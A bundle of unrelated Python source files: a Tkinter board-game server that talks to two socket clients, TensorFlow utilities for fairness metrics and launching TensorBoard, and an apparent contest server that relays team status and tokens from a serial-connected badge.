# standby
entobj.logger.info('{0:s}.standby()'.format(entity))
entobj.standby()
# exit control
entobj.logger.info('{0:s}.exitcontrol()'.format(entity))
entobj.exitcontrol()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# create shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = multiprocessing.Process(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s}.exitcode: {1:s}'.format(j.name, str(j.exitcode)))
|
TkBoard.py
|
import socket, sys, time
from Tkinter import *
from math import floor
from GameStack import GameStack
import Helpers as h
from sys import argv
from time import sleep
from threading import Thread
from threading import Timer
import time
import select
# TODO - print graph
socket_list = [] #Accepting incoming connections
WON1=0
WON2=0
winners=0
el=1
class TkBoard():
# CONSTANTS
N=13
M=13
K=14
SQUARE_SIZE = 20
PLAYER_SIZE = SQUARE_SIZE * 0.8
SQUARE_SPACING = 10
MARGIN = 20
is_redo_m=False
PANEL_WIDTH = 200
ICON_MARGIN = 55
BUTTON_Y_START = 125
BUTTON_WIDTH = 100
BUTTON_HEIGHT = 30
BUTTON_MARGIN = 10
LABEL_Y_START = 330
LABEL_FONT_SIZE = 12
LABEL_SPACING = 10
LABEL_TEXT = lambda s, n, c: ("%-"+str(n+7)+"s") % ("walls: "+"I"*c) # lambda c: "Walls: {0}".format(c)
DEFAULT_COLORS = {'bg': '#FFFFFF',
'square': '#333333',
'wall': '#DD6611',
'wall-error': '#CC1111',
'panel': '#333333',
'button': '#555555',#'#AA5303',
'text': '#000000',
'players': ['#11CC11', '#CC11CC', '#CC1111', '#11CCCC']
}
# CLASS VARIABLES - DRAWING
tk_root = None
tk_canv = None
players = []
player_ghost = None
icon = None
ai_label = None
squares = [[0]*13 for _ in range(13)]  # each row must be a distinct list, otherwise the rows alias each other
wall_labels = []
grid = None
canvas_dims = (0,0)
buttons = [] # will contain bbox and callback as tuple for each button
walls = {} # will be dictionary of name => id. all will exist, transparency toggled, colors changed for errors
active_wall = ""
active_move = ""
recent_x = 0
recent_y = 0
# GAME-INTERACTION VARIABLES
gs = None
moveType = "move"
game_over = False
# CONTROL VARIABLES
THREAD_SLEEP = 0.1
def set_default_colors(self, new_colors_dict={}):
"""update default colors with given dictionary of new color scheme
Given colors don't need to be complete - only updates those given"""
for k in new_colors_dict.keys():
if k in self.DEFAULT_COLORS.keys():
self.DEFAULT_COLORS[k] = new_colors_dict[k]
def new_game(self, np=2, nai=0):
"""Destroy old board, draw new board, update object state with new board
"""
if self.tk_root:
self.tk_root.destroy()
self.tk_root = Tk()
self.tk_root.bind("<Escape>", lambda e: self.handle_quit())
self.tk_root.bind("<Motion>", lambda e: self.handle_mouse_motion(e.x, e.y))
self.thread_kill = False
self.time_stats = []
# margin - space/2 - square - space - square - ... - square - space/2 - margin - panel
total_height = 13*self.SQUARE_SIZE + 13*self.SQUARE_SPACING + 2*self.MARGIN
total_width = total_height + self.PANEL_WIDTH
self.canvas_dims = (total_width, total_height)
self.tk_canv = Canvas(self.tk_root, width=total_width, height=total_height, background=self.DEFAULT_COLORS['bg'])
self.tk_canv.pack()
self.draw_squares()
self.generate_walls()
self.game_stack = GameStack(np, nai)
self.update_gs()
self.players = [(None, None)]*len(self.gs.players)
self.max_walls = self.gs.current_player.num_walls
self.wall_labels = [None]*len(self.gs.players)
self.draw_panel()
self.refresh(False)
th = Thread(target = lambda : self.background_loop())
th.start()
self.tk_root.mainloop()
def update_gs(self):
self.gs = self.game_stack.current
def background_loop(self):
global WON1
global WON2
global winners
global el
turn = 0
timeout=120.0
trackTime1=120.0
trackTime2=120.0
global message
global message2
for player in socket_list:
player.settimeout(timeout)
while True:
if turn==0:
try:
start=time.time()
message = socket_list[0].recv(1024)
end=time.time()
trackTime1=trackTime1-(end-start)
print trackTime1
msg=map(int,message.split(' '))
if WON1==1:
if msg[1]==0 or (msg[2]==0 and msg[0]==0):
socket_list[0].send(message2+" 31")
socket_list[1].send("0 0 0 31")
print "Player 1 passes. SUCCESS"
turn =1
success=self.handle_click(msg[0],msg[1],msg[2])
continue
message2=str(trackTime1)
if trackTime1<0:
raise socket.timeout
except socket.timeout:
if WON1==1:
print "Timed out"
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 timed out, But player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
print "Timed out"
socket_list[0].send(message2+" 2")
socket_list[1].send(message+" 1")
print "Player 1 timed out, Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
try:
start=time.time()
message = socket_list[1].recv(1024)
end=time.time()
trackTime2=trackTime2-(end-start)
print trackTime2
msg=map(int,message.split(' '))
if WON2==1:
if msg[1]==0 or (msg[2]==0 and msg[0]==0):
socket_list[1].send(message2+" 32")
socket_list[0].send("0 0 0 32")
print "Player 2 passes. SUCCESS"
turn =0
success=self.handle_click(msg[0],msg[1],msg[2])
continue
message2=str(trackTime2)
if trackTime2<0:
raise socket.timeout
except socket.timeout:
if WON2:
print "Timed out"
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 timed out, but Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
else:
print "Timed out"
socket_list[1].send(message2+" 2")
socket_list[0].send(message+" 1")
print "Player 2 timed out, Player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
success=self.handle_click(msg[0],msg[1],msg[2])
if success==0:
if turn==0 and WON1==1:
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 made invalid move, But, Player 1 wins"
elif turn==0 and WON1==0:
socket_list[0].send(message2+" 2")
socket_list[1].send(message+" 1")
print "Player 1 made invalid move, Player 2 wins"
elif turn==1 and WON2==1:
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 made invalid move, But, Player 2 wins"
elif turn==1 and WON2==0:
socket_list[1].send(message2+" 2")
socket_list[0].send(message+" 1")
print "Player 2 made invalid move, Player 1 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
if success==2:
if WON1==1:
if turn==0:
socket_list[0].send(message2+" 1")
socket_list[1].send(message+" 2")
print "Player 1 wins"
if turn==1:
socket_list[0].send(message+" 1")
socket_list[1].send(message2+" 2")
print "Player 1 wins"
if WON2==1:
if turn==1:
socket_list[1].send(message2+" 1")
socket_list[0].send(message+" 2")
print "Player 2 wins"
if turn==0:
socket_list[1].send(message+" 1")
socket_list[0].send(message2+" 2")
print "Player 2 wins"
socket_list[0].close()
socket_list[1].close()
sys.exit(0)
break
if success==1:
if turn==0 :
socket_list[0].send(message2+" 3")
socket_list[1].send(message+" 3")
if turn == 1:
socket_list[1].send(message2+" 3")
socket_list[0].send(message+" 3")
if success==31:
if turn==0 :
socket_list[0].send(message2+" 31")
socket_list[1].send(message+" 31")
if turn == 1:
socket_list[1].send(message2+" 31")
socket_list[0].send(message+" 31")
if success==32:
if turn==0 :
socket_list[0].send(message2+" 32")
socket_list[1].send(message+" 32")
if turn == 1:
socket_list[1].send(message2+" 32")
socket_list[0].send(message+" 32")
print "here: ",success
if self.thread_kill:
break
turn = 1-turn
for player in socket_list:
player.close()
print "--- END BACKGROUND LOOP ---"
def handle_quit(self):
self.thread_kill = True
for p in self.gs.players:
if p.ai:
p.ai.kill_thread()
self.tk_root.destroy()
def refresh(self, check_ai=True):
self.update_gs()
self.clear_ghost()
self.handle_mouse_motion(self.recent_x, self.recent_y)
self.active_wall = ""
self.active_move = ""
self.draw_players()
self.redraw_walls(False)
self.draw_current_player_icon()
self.draw_wall_counts()
def draw_current_player_icon(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH/2
radius = self.PLAYER_SIZE/2
x0, x1 = midx - radius, midx + radius
y0, y1 = self.ICON_MARGIN - radius, self.ICON_MARGIN + radius
c = self.DEFAULT_COLORS['players'][self.gs.current_player_num -1]
oval = self.tk_canv.create_oval(x0, y0, x1, y1, fill=c, outline="")
if self.icon:
self.tk_canv.delete(self.icon)
self.icon = oval
text = None
if self.gs.current_player.ai:
text = self.tk_canv.create_text((midx, self.ICON_MARGIN), text="AI", font=("Arial", 10, "bold"))
if self.ai_label:
self.tk_canv.delete(self.ai_label)
self.ai_label = text
def new_rect_button(self, text, fill, x0, y0, x1, y1, callback):
hover_lighten = TkBoard.alpha_hax(fill, "#FFFFFF", 0.25)
self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=fill, activefill=hover_lighten, outline="")
midx = (x0 + x1) / 2
midy = (y0 + y1) / 2
self.tk_canv.create_text((midx, midy), text=text, font=("Arial", 10, "bold"))
self.buttons.append(((x0, y0, x1, y1), callback))
def set_movetype(self, type):
self.moveType = type
self.refresh()
def toggle_movetype(self):
if self.moveType == "wall":
self.set_movetype("move")
elif self.moveType == "move":
self.set_movetype("wall")
self.refresh()
def draw_panel(self):
# panel bg
width, height = self.canvas_dims
midx = width-self.PANEL_WIDTH/2
c = self.DEFAULT_COLORS['panel']
self.tk_canv.create_rectangle(width-self.PANEL_WIDTH, 0, width, height, fill=c)
# current-player icon @ top
self.draw_current_player_icon()
# buttons!
c = self.DEFAULT_COLORS['button']
x0, x1 = midx-self.BUTTON_WIDTH/2, midx+self.BUTTON_WIDTH/2
y0, y1 = self.BUTTON_Y_START, self.BUTTON_Y_START + self.BUTTON_HEIGHT
self.new_rect_button("Move", c, x0, y0, x1, y1, lambda: self.set_movetype("move"))
yshift = self.BUTTON_HEIGHT + self.BUTTON_MARGIN
y0 += yshift
y1 += yshift
self.new_rect_button("Wall", c, x0, y0, x1, y1, lambda: self.set_movetype("wall"))
y0 += yshift
y1 += yshift
self.new_rect_button("undo", c, x0, y0, x1, y1, lambda: self.undo())
y0 += yshift
y1 += yshift
self.new_rect_button("redo", c, x0, y0, x1, y1, lambda: self.redo())
# "walls: IIII" text
self.draw_wall_counts()
def undo(self):
self.game_stack.undo()
self.refresh(False)
self.game_over = False
def redo(self):
self.game_stack.redo()
self.refresh()
def draw_wall_counts(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH/2
y = self.LABEL_Y_START
for i in range(len(self.gs.players)):
p = self.gs.players[i]
text = self.LABEL_TEXT(self.max_walls, p.num_walls)
c = self.DEFAULT_COLORS['players'][i]
l = self.wall_labels[i]
if not l:
l = self.tk_canv.create_text((midx, y), text=text, font=("Arial", self.LABEL_FONT_SIZE, "bold"), fill=c)
self.wall_labels[i] = l
else:
self.tk_canv.itemconfigure(l, text=text)
y += self.LABEL_SPACING + self.LABEL_FONT_SIZE
def handle_mouse_motion(self, x, y):
if self.game_over or self.gs.current_player.ai:
return
self.recent_x = x
self.recent_y = y
grid = self.point_to_grid((x,y))
if grid and self.moveType == "move":
move_str = h.point_to_notation(grid)
if move_str != self.active_move:
self.active_move = move_str
if self.gs.turn_is_valid(move_str, "move"):
self.draw_player(grid, self.gs.current_player_num-1, True)
elif self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = h.point_to_notation(topleft)
wall_str = orient+pos
if wall_str != self.active_wall:
self.active_wall = wall_str
active_error = not self.gs.turn_is_valid(wall_str, "wall")
self.redraw_walls(active_error)
def handle_click(self,m,xi,yi):
x=10
y=20
print self.gs.current_player.position[0]
for b in self.buttons:
(x0, y0, x1, y1), callback = b
if (x0 <= x <= x1) and (y0 <= y <= y1):
callback()
return
if self.game_over or self.gs.current_player.ai:
return
print self.moveType
# check for turn execution
global is_redo_m
is_redo_m=False
if WON1==1 and self.gs.current_player_num==1 and m==0:
grid=self.gs.current_player.position
is_redo_m=True
elif WON2==1 and self.gs.current_player_num==2 and m==0:
grid=self.gs.current_player.position
is_redo_m=True
else:
grid=(xi,yi)
if m == 1 :
self.moveType="wall"
elif m == 2 :
self.moveType="wall"
else :
self.moveType="move"
if grid and self.moveType == "move":
move_str = h.point_to_notation(grid)
success = self.exec_wrapper(move_str)
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
if m == 1:
orient='H'
if m == 2:
orient='V'
pos = h.point_to_notation(topleft)
wall_str = orient+pos
success = self.exec_wrapper(wall_str)
print success
if success:
self.refresh()
return success
def handle_keypress(self, key):
(cr, cc) = self.gs.current_player.position
if key == "L":
cc -= 1
elif key == "R":
cc += 1
elif key == "U":
cr -= 1
elif key == "D":
cr += 1
move_str = h.point_to_notation((cr, cc))
success = self.exec_wrapper(move_str)
if success:
self.refresh()
def wall_on(self, wall_str, error=False):
color = self.DEFAULT_COLORS['wall'] if not error else self.DEFAULT_COLORS['wall-error']
if wall_str in self.walls:
box_id = self.walls[wall_str]
if not error:
self.tk_canv.itemconfigure(box_id, fill=color)
else:
# instead of above: changing color, delete and redraw it
# so it's the topmost element
self.tk_canv.delete(box_id)
(x0, y0, x1, y1) = self.wall_str_to_coords(wall_str)
self.walls[wall_str] = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=color, outline="")
def wall_off(self, wall_str):
if wall_str in self.walls:
box_id = self.walls[wall_str]
self.tk_canv.itemconfigure(box_id, fill="")
def redraw_walls(self, active_error=True):
for w in self.walls.keys():
self.wall_off(w)
for w in self.gs.walls:
self.wall_on(w)
if self.active_wall:
self.wall_on(self.active_wall, active_error)
def exec_wrapper(self, turn_str, from_ai=False):
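# Return codes consumed by background_loop: 0 = invalid turn, 1 = valid turn,
# 2 = game over (second winner), 31/32 = player 1 / player 2 has already finished.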
global WON1
global WON2
global winners
global el
global is_redo_m
is_ai = self.gs.current_player.ai is not None
if from_ai != is_ai:
return 0
print "EXECUTING %s TURN" % ("AI" if is_ai else "HUMAN")
success = self.game_stack.execute_turn(turn_str,is_redo_m)
print success
is_redo_m=False
self.update_gs()
if success == 1:
if WON1==1:
print "\tSUCCESS_1"
self.moveType = "move"
self.refresh(False)
return 31
if WON2==1:
print "\tSUCCESS_2"
self.moveType = "move"
self.refresh(False)
return 32
print "\tSUCCESS"
self.moveType = "move"
self.refresh(False)
if WON1==1:
return 31
if WON2==1:
return 32
return 1
elif success == 2:
# winner!
print "Winner!!"
winners=winners+1
print "Player", self.gs.current_player_num
if winners==1:
el=0
if self.gs.current_player_num==2:
WON1=1
return 31
else:
WON2=1
return 32
if winners==2:
self.game_over = True
return 2
print "\tFAILED"
return 0
def draw_squares(self):
import random
for r in range(13):
for c in range(13):
x = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*c
y = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*r
color = self.DEFAULT_COLORS['square']
sq = self.tk_canv.create_rectangle(x, y, x+self.SQUARE_SIZE, y+self.SQUARE_SIZE, fill=color, outline="")
self.squares[r][c] = sq
def generate_walls(self):
for w in h.all_walls():
(x0, y0, x1, y1) = self.wall_str_to_coords(w)
# regular wall
r = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill="", outline="")
self.walls[w] = r
def xy_to_wall_spec(self, grid, x, y):
cx, cy = self.grid_to_point(grid)
dx = x-cx
dy = y-cy
# wall orientation: rotate the click offset from the square centre by 45 degrees;
# the sign of the product of the rotated coordinates tells whether the click
# lies in a vertical or a horizontal wall slot
r2 = 2**0.5
rotx = r2*dx - r2*dy
roty = r2*dx + r2*dy
if rotx*roty >= 0:
orient = 'V'
else:
orient = 'H'
# wall position (top-left)
gr, gc = grid
if dx < 0:
gc -= 1
if dy < 0:
gr -= 1
return (orient, (gr, gc))
def wall_str_to_coords(self, wall_str):
grid_pos = h.notation_to_point(wall_str[1:])
orient = wall_str[0]
cx, cy = self.grid_to_point(grid_pos)
wall_len = 2*self.SQUARE_SIZE + self.SQUARE_SPACING
wall_wid = self.SQUARE_SPACING
halfwidth = self.SQUARE_SIZE/2
if orient == 'V':
x0 = cx + halfwidth
y0 = cy - halfwidth
x1 = x0 + wall_wid
y1 = y0 + wall_len
elif orient == 'H':
x0 = cx - halfwidth
y0 = cy + halfwidth
x1 = x0 + wall_len
y1 = y0 + wall_wid
return (x0, y0, x1, y1)
def draw_players(self):
game_state = self.gs
# draw new ones
for i in range(len(game_state.players)):
p = game_state.players[i]
self.draw_player(p.get_pos(), i)
def draw_player(self, center, num, ghost=False):
xy = self.grid_to_point(center)
if not xy:
return
x, y = xy
# remove old ovals from the board
oval, text = self.players[num]
if not ghost and oval:
self.tk_canv.delete(oval)
if text:
self.tk_canv.delete(text)
elif ghost and self.player_ghost:
self.tk_canv.delete(self.player_ghost)
# draw new
c = self.DEFAULT_COLORS['players'][num]
if ghost:
bg = self.DEFAULT_COLORS['square']
c = TkBoard.alpha_hax(bg, c, 0.4)
radius = self.PLAYER_SIZE/2
oval = self.tk_canv.create_oval(x-radius, y-radius, x+radius, y+radius, fill=c, outline="")
text = None
if self.gs.players[num].ai:
text = self.tk_canv.create_text((x, y), text="AI", font=("Arial", 11, "bold"))
if not ghost:
self.players[num] = (oval, text)
else:
self.player_ghost = oval
def clear_ghost(self):
if self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
def grid_to_point(self, grid_pt):
"""given (row, col), return centerpoint of that square on the canvas
If not a valid grid point, return None"""
r, c = grid_pt
if (1 <= r <= 13) and (1 <= c <= 13):
x = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*(c-1)
y = self.MARGIN + self.SQUARE_SPACING/2 + (self.SQUARE_SIZE+self.SQUARE_SPACING)*(r-1)
halfsquare = self.SQUARE_SIZE/2
return (x+halfsquare, y+halfsquare)
else:
return None
def point_to_grid(self, xy):
"""given (x, y), return (row, col) of corresponding grid space.
If off the grid or one row of spacing on outside, returns None"""
x, y = xy
x -= self.MARGIN
y -= self.MARGIN
full_space = self.SQUARE_SIZE + self.SQUARE_SPACING
r = int(floor(y / full_space) + 1)
c = int(floor(x / full_space) + 1)
if (1 <= r <= 13) and (1 <= c <= 13):
return (r, c)
else:
return None
@staticmethod
def alpha_hax(back, front, alpha):
"""since tkinter doesnt support alpha channels as far as I can tell,
this function does 2-color blending on hex strings, returning blended hex string"""
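# e.g. alpha_hax("#000000", "#FFFFFF", 0.5) blends to "#7f7f7f"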
# get numeric values
b_r = int(back[1:3], 16)
b_g = int(back[3:5], 16)
b_b = int(back[5:7], 16)
f_r = int(front[1:3], 16)
f_g = int(front[3:5], 16)
f_b = int(front[5:7], 16)
# combine 'em
new_r = int(b_r * (1-alpha) + f_r * alpha)
new_g = int(b_g * (1-alpha) + f_g * alpha)
new_b = int(b_b * (1-alpha) + f_b * alpha)
# get hex versions, take off leading '0x' and pad with "0" when len() < 2
hex_r = hex(new_r)[2:].rjust(2,"0")
hex_g = hex(new_g)[2:].rjust(2,"0")
hex_b = hex(new_b)[2:].rjust(2,"0")
return "#"+hex_r+hex_g+hex_b
def disp_time_stats(self):
print self.time_stats
def __init__(self, n, ai):
self.new_game(n, ai)
if __name__ == "__main__":
n = 2
if len(argv) > 1:
try:
n = int(argv[1])
except:
pass
ai = 0
if len(argv) > 2:
try:
ai = int(argv[2])
except:
pass
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.settimeout(30)
serversocket.bind(('127.0.0.1', 12345))
serversocket.listen(2)
print ("Server running and waiting for clients to connect")
while True:
clientsocket, addr = serversocket.accept()
print ("Client Connected from %s" % str(addr))
socket_list.append(clientsocket)
if len(socket_list)==2:
print "Both clients connected"
break
# 1st client will be in socket_list[0] and 2nd will be socket_list[1]
socket_list[0].send('1 13 13 14 120')
socket_list[1].send('2 13 13 14 120')
tkb = TkBoard(n, ai)
|
tf_utils.py
|
import tensorflow as tf
def _weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.get_variable("W", initializer=initial)
def _bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.get_variable("b", initializer=initial)
def _linear(x, output_size, name):
"""Construct a fully-connected linear layer.
"""
with tf.variable_scope(name):
W = _weight_variable([x.get_shape().as_list()[1], output_size])
b = _bias_variable([output_size])
output = tf.matmul(x, W) + b
return output
def lrelu(x, leak=0.2, name="lrelu"):
return tf.maximum(x, leak*x, name=name)
def zero_nans(*tensors):
return [tf.where(tf.is_nan(t), 0.0, t) for t in tensors]
def ema_apply_wo_nans(ema, tensors):
"""Updates ExponentialMovingAverage (ema) with current values of tensors
(similar to ema.apply(tensors) ), while ignoring tensors with NaN values.
"""
return [tf.cond(tf.is_nan(t),
true_fn = lambda: tf.no_op(),
false_fn = lambda: ema.apply([t]))
for t in tensors]
# ====== Tensorboard Ops ====================
from multiprocessing import Process
import subprocess
def launch_tensorboard(logdir, tensorboard_path=None):
if tensorboard_path is None:
import platform
assert platform.node() != 'Yonadavs-MacBook-Air.local', "New users must specify path to tensorboard"
tensorboard_path = '/Users/yonadav/anaconda/envs/tensorflow3.5/bin/tensorboard'
def _call_tensorboard():
subprocess.call("{} --logdir={}".format(tensorboard_path, logdir),
shell=True)
tensorboard_process = Process(target=_call_tensorboard)
tensorboard_process.start()
return tensorboard_process
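# Hypothetical usage (log directory and binary name are illustrative only):
#
#   proc = launch_tensorboard("./logs", tensorboard_path="tensorboard")
#   ...  # train and write summaries under ./logs
#   proc.terminate()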
# ======= Bias-specific Ops =========================
def demographic_parity_discrimination(yhat, a):
"""Computes the difference in the mean prediction between protected
classes. (https://www.cs.toronto.edu/~toni/Papers/icml-final.pdf Eq. 14)
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
Returns:
A scalar tensor of the difference in mean prediction between classes.
"""
yhat_a0, yhat_a1 = tf.dynamic_partition(yhat, tf.cast(a, tf.int32), 2)
disc = tf.abs(tf.reduce_mean(yhat_a0) - tf.reduce_mean(yhat_a1))
return disc
def equalized_odds_discrimination(yhat, a, y):
"""Computes the difference in the mean prediction between protected classes,
conditioned on the true outcome. Equivalent to the deviation from
'Equalized Odds' defined in https://arxiv.org/pdf/1610.02413.pdf
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
y - n x 1 tf.bool tensor marking the individual's true outcome
Returns:
false_negative_parity_error - a scalar tensor of the mean deviation for
negative outcomes
false_positive_parity_error - a scalar tensor of the mean deviation for
positive outcomes
"""
partitions = tf.cast(y, tf.int32)*2 + tf.cast(a, tf.int32)
yhat_y0_a0, yhat_y0_a1, yhat_y1_a0, yhat_y1_a1 = tf.dynamic_partition(
yhat, partitions, 4)
false_negative_parity_error = tf.abs(tf.reduce_mean(yhat_y0_a0) -
tf.reduce_mean(yhat_y0_a1))
false_positive_parity_error = tf.abs(tf.reduce_mean(yhat_y1_a0) -
tf.reduce_mean(yhat_y1_a1))
return false_negative_parity_error, false_positive_parity_error
def crossentropy(yhat, y):
return -(tf.log(yhat)*y + tf.log(1-yhat)*(1-y))
def calibration_parity_loss(yhat, a, y, yhat_logits=None):
"""Computes the abs difference in the mean loss between protected
classes. (https://www.cs.toronto.edu/~toni/Papers/icml-final.pdf Eq. 14)
Args:
yhat - n x 1 tensor of predictions
a - n x 1 tf.bool tensor marking whether the individual is from the
protected class
yhat_logits - optional, n x 1 tensor of prediction logits used to
compute the crossentropy more efficiently if provided
Returns:
A scalar tensor of the difference in mean loss between classes.
"""
# TODO: implement check if there are no members of one of the classes
a = tf.cast(a, tf.int32)
y_a0, y_a1 = tf.dynamic_partition(tf.cast(y, tf.float32),
a, 2)
if yhat_logits is not None:
yhat_logits_a0, yhat_logits_a1 = tf.dynamic_partition(yhat_logits, a, 2)
disc = tf.abs(
tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(labels=y_a0,
logits=yhat_logits_a0))
- tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(labels=y_a1,
logits=yhat_logits_a1)))
else:
yhat_a0, yhat_a1 = tf.dynamic_partition(yhat, a, 2)
disc = tf.abs(
tf.reduce_mean(crossentropy(yhat_a0, y_a0))
- tf.reduce_mean(crossentropy(yhat_a1, y_a1))
)
return disc
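# A rough usage sketch in TF1-style graph mode (tensor names below are illustrative, not part of this module):
#
#   yhat = tf.sigmoid(yhat_logits)                             # n x 1 predictions
#   dp = demographic_parity_discrimination(yhat, a)
#   fn_err, fp_err = equalized_odds_discrimination(yhat, a, y)
#   cal = calibration_parity_loss(yhat, a, y, yhat_logits=yhat_logits)
#   total_loss = task_loss + fairness_weight * (dp + fn_err + fp_err + cal)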
|
server_client.py
|
#!/usr/bin/env python
import socket # Import socket module
import serial, time
import binascii
import struct
import SocketServer
import threading
import logging
import Queue
import argparse
from select import select
import sys
import parse
# Time to allow a connection to stay open (in seconds)
TIMEOUT = 20
# SLA team list
sla_team_list = list()
token_team_list = list()
# Setup the vip message queue (allow only 1 message maximum in the queue)
vip_message_queue = Queue.Queue(1)
def init_sla_list():
# Default to SLA pass
for i in range(0, 20):
sla_team_list.append(True)
def init_token_list():
# Default to empty strings
for i in range(0, 20):
token_team_list.append("")
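# Wire protocols served below (derived from the handlers):
#   SLA poll   (port 8000): client sends "TEAM<n>",    reply is "PASS", "FAIL" or "ERROR"
#   Token drop (port 8001): client sends "DEPOSIT<n>", reply is that team's token string
#   VIP        (port 8002): client sends a line starting with "vip", forwarded to the badge over serial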
class SLAHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.request.recv(1024).strip()
print "SLA {} wrote:".format(self.client_address[0])
print self.data
if ( self.data.find("TEAM") == 0 ):
team_num = int(self.data[4:])
if ( team_num < 20 ):
sla_for_team = sla_team_list[team_num]
if ( sla_for_team == True ):
self.request.sendall('PASS')
else:
self.request.sendall('FAIL')
else:
self.request.sendall('ERROR')
self.request.sendall('\n')
self.request.close()
except socket.timeout:
self.request.close()
return
class SLAServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
class TokenHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.request.recv(1024).strip()
print "SLA {} wrote:".format(self.client_address[0])
print self.data
if ( self.data.find("DEPOSIT") == 0 ):
team_num = int(self.data[7:])
if ( team_num < 20 ):
token_for_team = token_team_list[team_num]
self.request.sendall(token_for_team)
else:
self.request.sendall('ERROR')
self.request.sendall('\n')
self.request.close()
except socket.timeout:
self.request.close()
return
class TokenServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
class VIPHandler(SocketServer.StreamRequestHandler):
def handle(self):
try:
self.request.settimeout(TIMEOUT)
self.data = self.rfile.readline().strip()
if ( self.data.find("vip") == 0 ):
# Send VIP message to badge
vip_message_queue.put( self.data )
except socket.timeout:
self.request.close()
return
class VIPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
pass
def process_serial_line( line_buf ):
if ( line_buf.find('SLR:') != -1 ):
results = parse.parse('SLR: {:d}:{:d}:{}', line_buf)
if ( results is not None ):
round_num = results[0]
team_num = results[1]
pass_result = results[2]
if ( pass_result == 'PASS' ):
sla_team_list[team_num] = True
else:
sla_team_list[team_num] = False
elif ( line_buf.find('TOK:') != -1 ):
results = parse.parse('TOK: Token:{:d}:{}', line_buf )
if ( results is not None ):
team_num = results[0]
token_string = results[1]
token_team_list[team_num] = token_string
class SerialBadgeConnection:
def Run( self, serial_port ):
ser = serial.Serial( )
ser.port = serial_port
ser.baudrate = 115200
ser.bytesize = serial.EIGHTBITS
ser.parity = serial.PARITY_NONE
ser.stopbits = serial.STOPBITS_ONE
ser.timeout = 0
ser.xonxoff = False
ser.rtscts = False
ser.dsrdtr = False
select_timeout = 0.01
sys.stdout.write('Server> ')
sys.stdout.flush()
line_buf = ""
try:
ser.open()
ser.flushInput()
ser.flushOutput()
if ( ser.isOpen() == False ):  # isOpen is a method; without calling it this check could never trigger
print "Failed to open serial console"
return
while ( True ):
rlist, _, _ = select([sys.stdin], [], [], 0.1 )
if sys.stdin in rlist:
in_line = sys.stdin.readline()
new_line = in_line.rstrip().encode()
print "Sent: %s" % new_line
ser.flush()
ser.write( new_line + '\n' )
#time.sleep(0.01)
#ser.write('\n')
ser.flush()
sys.stdout.write('Server> ')
sys.stdout.flush()
# Drain any pending serial data from the badge
while ( ser.inWaiting() > 0 ):
char = ser.read(size=1)
if ( char == '\n' ):
# Process the serial line
process_serial_line( line_buf )
print "Line: %s\n" % line_buf
line_buf = ""
sys.stdout.write('Server> ')
sys.stdout.flush()
else:
line_buf += char
ser.write('\n')
ser.flush()
# SEND VIP messages to the badge if they are available
try:
vip_message = vip_message_queue.get_nowait()
except Queue.Empty:
# Ignore
pass
else:
# Process VIP message -- send to badge
sys.stdout.write('[VIP] ' + vip_message.encode() + '\n')
sys.stdout.flush()
ser.write( vip_message.encode() + '\n' )
ser.flush()
# Run serial connection to server badge
#if ( token_deposit_queue.get_nowait() is not None ):
# print 'TODO: Send deposit to server'
# Check for input
except Exception, e:
ser.close()
print "Serial Error : " + str(e)
raise e
return
ser.close()
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Badge SLA laptop client')
parser.add_argument('-p', '--port', default='/dev/ttyUSB0', help='Sets the serial port')
program_args = vars(parser.parse_args())
# Initialize the SLA poll results
init_sla_list()
init_token_list()
# Run SLA poll server
sla_address = ( '0.0.0.0', 8000 )
sla_server = SLAServer( sla_address, SLAHandler )
sla_ip, sla_port = sla_server.server_address
t = threading.Thread(target=sla_server.serve_forever)
